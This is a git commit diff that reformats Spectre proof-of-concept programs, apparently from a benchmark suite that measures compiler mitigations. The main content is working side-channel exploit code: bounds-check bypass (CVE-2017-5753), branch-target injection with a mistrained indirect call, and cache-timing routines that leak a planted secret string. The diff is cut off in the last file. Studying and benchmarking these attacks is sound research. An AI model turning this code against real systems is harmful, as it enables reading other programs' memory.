Final touch: style and tabulations.

This commit is contained in:
Samuel Aubertin 2022-01-28 16:33:17 +01:00
parent 64f0c6b318
commit 47946f6aed
4 changed files with 400 additions and 614 deletions

View File

@ -34,11 +34,11 @@ LDFLAGS= -fuse-ld=lld
CCS= clang gcc CCS= clang gcc
OPTIMIZATIONS= 0 1 2 3 fast s OPTIMIZATIONS= 0 1 2 3 fast s
RETPOLINE= mretpoline RETPOLINE= mretpoline
UUID:= $(shell uuid) UUID:= $(shell uuid || uuidgen)
RESULTS_FILE:= results-$(UUID).json RESULTS_FILE:= results-$(UUID).json
SSH_KEY= octoupload SSH_KEY= octoupload
TIMES= 3 TIMES= 3
FLAGS= -j OCTOFLAGS= -j
### Octopus internals ### Octopus internals
CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}')
@ -148,7 +148,7 @@ $(RESULTS_FILE): build
for p in $(PROGS); do \ for p in $(PROGS); do \
for t in $$(seq $(TIMES)); do \ for t in $$(seq $(TIMES)); do \
sleep 0.1; \ sleep 0.1; \
(taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \ (taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \
if ! [ "$$p" = "$(lastword $(PROGS))" ]; \ if ! [ "$$p" = "$(lastword $(PROGS))" ]; \
then echo ',' >> $@; \ then echo ',' >> $@; \
else if ! [ $$t -eq $(TIMES) ]; \ else if ! [ $$t -eq $(TIMES) ]; \

144
octopus.h Normal file
View File

@ -0,0 +1,144 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h>
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(uint8_t * addr)
{
float* p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
static inline unsigned
timed_access(volatile uint8_t *addr)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = *addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(unsigned int *threshold)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t* bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}

View File

@ -19,332 +19,148 @@
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/ */
#include <stdio.h> #include "octopus.h"
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__) char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
#define CACHELINE_SIZE 64 unsigned int cache_hit_threshold, array1_size = 16;
#else uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
#error "unsupported architecture" uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(
unsigned long index,
unsigned long size
)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold;
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
void void
victim_function( victim_function(size_t x)
size_t x
)
{ {
if (x < array1_size) { if (x < array1_size) {
#ifdef LFENCE_MITIGATION #ifdef LFENCE_MITIGATION
/* /*
* According to Intel et al, the best way to mitigate this is to * According to Intel et al, the best way to mitigate this is to
* add a serializing instruction after the boundary check to force * add a serializing instruction after the boundary check to force
* the retirement of previous instructions before proceeding to * the retirement of previous instructions before proceeding to
* the read. * the read.
* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
*/ */
_mm_lfence(); _mm_lfence();
#endif #endif
#ifdef MASKING_MITIGATION #ifdef MASKING_MITIGATION
x &= array_index_mask_nospec(x, array1_size); x &= array_index_mask_nospec(x, array1_size);
#endif #endif
temp &= array2[array1[x] * 512];
} temp &= array2[array1[x] * 512];
}
} }
void void
leak( leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
size_t malicious_x,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{ {
static int results[256]; static int results[256];
int tries, i, j, mix_i; int tries, i, j, mix_i, junk = 0;
unsigned int junk = 0; size_t training_x, x;
size_t training_x, x; volatile uint8_t* addr;
volatile uint8_t *addr;
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
int junk2 = 0; int junk2 = 0;
int l; int l;
(void)junk2; (void)junk2;
#endif #endif
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
results[i] = 0; results[i] = 0;
}
for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]);
#else
/* Flush array2[256*(0..255)] from cache
using long SSE instruction several times */
for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) {
flush_memory_sse( & array2[i * 512]);
}
}
#endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
_mm_clflush(&array1_size);
#else
/* Alternative to using clflush to flush the CPU cache
* Read addresses at 4096-byte intervals out of a large array.
* Do this around 2000 times, or more depending on CPU cache size. */
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
junk2 = cache_flush_array[l];
}
#endif
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest results in j */
j = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
j = i;
}
}
if (results[j] >= 3)
break;
} }
for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]);
#else
/* Flush array2[256*(0..255)] from cache
using long SSE instruction several times */
for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) {
flush_memory_sse(&array2[i * 512]);
}
}
#endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
_mm_clflush(&array1_size);
#else
/* Alternative to using clflush to flush the CPU cache
* Read addresses at 4096-byte intervals out of a large array.
* Do this around 2000 times, or more depending on CPU cache size. */
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
junk2 = cache_flush_array[l];
}
#endif
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest results in j */
j = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
j = i;
}
}
if (results[j] >= 3)
break;
}
results[0] ^= junk; /* use junk so code above wont get optimized out*/ results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j; value[0] = (uint8_t) j;
score[0] = results[j]; score[0] = results[j];
} }
int int
main( main(int argc, char** argv)
int argc,
char** argv
)
{ {
int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int i, score[2], len = (int)strlen(secret); int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
uint8_t value[2]; uint8_t value[2];
unsigned successes = 0;
int json = 0;
while ((o = getopt(argc, argv, "t:j")) != EOF) { while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) { switch (o) {
case 't': case 't':
cache_hit_threshold = atoi(optarg); cache_hit_threshold = atoi(optarg);
break; break;
case 'j': case 'j':
json++; json++;
break; break;
default: default:
usage: usage:
fprintf(stderr, "usage: %s [-j] " fprintf(stderr, "usage: %s [-j] "
"[-t threshold]\n" "[-t threshold]\n"
"\t-j\t\tJSON output\n" "\t-j\t\tJSON output\n"
"\t-t INT\t\tfixed threshold\n", argv[0]); "\t-t INT\t\tfixed threshold\n", argv[0]);
return 1; return 1;
} }
} }
if (argc != optind) if (argc != optind) {
goto usage; goto usage;
}
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret));
argv[0] + 2,
(int)strlen(secret));
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) { for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1; cache_flush_array[i] = 1;
} }
#endif #endif
for (i = 0; i < (int)sizeof(array2); i++) {
for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
}
while (--len >= 0) { while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold); leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -358,57 +174,54 @@ main(
if (json) { if (json) {
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
printf("\"rdtscp\": true, "); printf("\"rdtscp\": true, ");
#else #else
printf("\"rdtscp\": false, "); printf("\"rdtscp\": false, ");
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
printf("\"mfence\": true, "); printf("\"mfence\": true, ");
#else #else
printf("\"mfence\": false, "); printf("\"mfence\": false, ");
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
printf("\"clflush\": true "); printf("\"clflush\": true ");
#else #else
printf("\"clflush\": false "); printf("\"clflush\": false ");
#endif #endif
printf("}, \"mitigations\": { "); printf("}, \"mitigations\": { ");
#ifdef LFENCE_MITIGATION #ifdef LFENCE_MITIGATION
printf("\"lfence\": true, "); printf("\"lfence\": true, ");
#else #else
printf("\"lfence\": false, "); printf("\"lfence\": false, ");
#endif #endif
#ifdef MASKING_MITIGATION #ifdef MASKING_MITIGATION
printf("\"masking\": true "); printf("\"masking\": true ");
#else #else
printf("\"masking\": false "); printf("\"masking\": false ");
#endif #endif
printf("}, "); printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }", printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
100 * successes / (float)strlen(secret));
} }
fprintf(stderr, "[+] %-27s\t",argv[0] + 2); fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
fprintf(stderr, "RDTSCP "); fprintf(stderr, "RDTSCP ");
#else #else
fprintf(stderr, "RDTSC "); fprintf(stderr, "RDTSC ");
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
fprintf(stderr, "MFENCE "); fprintf(stderr, "MFENCE ");
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH "); fprintf(stderr, "CLFLUSH ");
#endif #endif
#ifdef LFENCE_MITIGATION #ifdef LFENCE_MITIGATION
fprintf(stderr, "LFENCE_MITIGATION "); fprintf(stderr, "LFENCE_MITIGATION ");
#endif #endif
#ifdef MASKING_MITIGATION #ifdef MASKING_MITIGATION
fprintf(stderr, "MASKING_MITIGATION "); fprintf(stderr, "MASKING_MITIGATION ");
#endif #endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
cache_hit_threshold,
100 * successes / (float)strlen(secret));
return 0; return 0;
} }

View File

@ -18,83 +18,20 @@
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/ */
#include <stdio.h> #include "octopus.h"
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#define GAP 1024 #define GAP 1024
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
uint8_t channel[256 * GAP]; // side channel to extract secret phrase uint64_t* target; // pointer to indirect call target
uint64_t *target; // pointer to indirect call target unsigned int cache_hit_threshold, array1_size = 16;
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */ uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold; uint8_t channel[256 * GAP]; // side channel to extract secret phrase
// mistrained target of indirect call // mistrained target of indirect call
int int
gadget( gadget(char* addr)
char *addr
)
{ {
return channel[*addr * GAP]; // speculative loads fetch data into the cache return channel[*addr * GAP]; // speculative loads fetch data into the cache
} }
@ -106,89 +43,13 @@ safe_target()
return 42; return 42;
} }
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
// function that makes indirect call // function that makes indirect call
// note that addr will be passed to gadget via %rdi // note that addr will be passed to gadget via %rdi
int int
victim_function( victim_function(char* addr, int input)
char *addr,
int input
)
{ {
#pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk; unsigned int result, junk = junk;
// set up branch history buffer (bhb) by performing >29 taken branches // set up branch history buffer (bhb) by performing >29 taken branches
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
// for details about how the branch prediction mechanism works // for details about how the branch prediction mechanism works
@ -197,171 +58,142 @@ victim_function(
input += i; input += i;
junk += input & i; junk += input & i;
} }
int result;
// call *target // call *target
__asm volatile("callq *%1\n" __asm volatile("callq *%1\n"
"mov %%eax, %0\n" "mov %%eax, %0\n"
: "=r" (result) : "=r" (result)
: "r" (*target) : "r" (*target)
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
return result & junk; return result & junk;
} }
static inline void static inline void
leak( leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
char *target_addr,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{ {
static int results[256]; static int results[256];
int tries, i, j, mix_i; int tries, i, j, mix_i;
unsigned int junk = 0; unsigned int junk = 0;
volatile uint8_t *addr; volatile uint8_t* addr;
char dummy = '@'; char dummy = '@';
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
int junk2 = 0; int junk2 = 0;
int l; int l;
(void)junk2; (void)junk2;
#endif #endif
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
results[i] = 0; results[i] = 0;
channel[i * GAP] = 1; channel[i * GAP] = 1;
} }
for (tries = 999; tries > 0; tries--) { for (tries = 999; tries > 0; tries--) {
*target = (uint64_t)&gadget; *target = (uint64_t)&gadget;
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
for (j = 50; j > 0; j--) { for (j = 50; j > 0; j--) {
junk ^= victim_function(&dummy, 0); junk ^= victim_function(&dummy, 0);
} }
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
for (i = 0; i < 256; i++) for (i = 0; i < 256; i++) {
_mm_clflush(&channel[i * GAP]); _mm_clflush(&channel[i * GAP]);
}
#else #else
for (j = 0; j < 16; j++) { for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
flush_memory_sse(&channel[i * GAP]); flush_memory_sse(&channel[i * GAP]);
} }
} }
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// change to safe target // change to safe target
*target = (uint64_t)&safe_target; *target = (uint64_t)&safe_target;
#ifndef NOMFENCE
_mm_mfence();
#endif
#ifndef NOMFENCE
_mm_mfence();
#endif
// flush target to prolong misprediction interval // flush target to prolong misprediction interval
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
_mm_clflush((void*) target); _mm_clflush((void*) target);
#else #else
flush_memory_sse((void*) target);
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// call victim // call victim
junk ^= victim_function(target_addr, 0); junk ^= victim_function(target_addr, 0);
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// now, the value of *addr_to_read should be cached even though
// the logical execution path never calls gadget()
// now, the value of *addr_to_read should be cached even though /* Time reads. Order is lightly mixed up to prevent stride prediction */
// the logical execution path never calls gadget() for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
// time reads, mix up order to prevent stride prediction addr = & channel[mix_i * GAP];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {
results[mix_i]++; /* cache hit - add +1 to score for this value */
/* Time reads. Order is lightly mixed up to prevent stride prediction */ }
for (i = 0; i < 256; i++) { }
mix_i = ((i * 167) + 13) & 255; /* Locate highest results in j */
addr = & channel[mix_i * GAP]; j = -1;
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) for (i = 0; i < 256; i++) {
results[mix_i]++; /* cache hit - add +1 to score for this value */ if (j < 0 || results[i] >= results[j]) {
} j = i;
}
/* Locate highest results in j */ }
j = -1; if (results[j] >= 3) {
for (i = 0; i < 256; i++) { break;
if (j < 0 || results[i] >= results[j]) { }
j = i;
}
}
if (results[j] >= 3)
break;
} }
results[0] ^= junk; /* use junk so code above wont get optimized out*/ results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j; value[0] = (uint8_t) j;
score[0] = results[j]; score[0] = results[j];
} }
int int
main( main(int argc, char** argv)
int argc,
char** argv
)
{ {
target = (uint64_t*)malloc(sizeof(uint64_t)); int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
int o; uint8_t value[2];
//size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ char* addr = secret;
int score[2], len = (int)strlen(secret);
uint8_t value[2];
unsigned successes = 0;
int json = 0;
char *addr = secret;
while ((o = getopt(argc, argv, "t:j")) != EOF) { while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) { switch (o) {
case 't': case 't':
cache_hit_threshold = atoi(optarg); cache_hit_threshold = atoi(optarg);
break; break;
case 'j': case 'j':
json++; json++;
break; break;
default: default:
usage: usage:
fprintf(stderr, "usage: %s [-j] " fprintf(stderr, "usage: %s [-j] "
"[-t threshold]\n" "[-t threshold]\n"
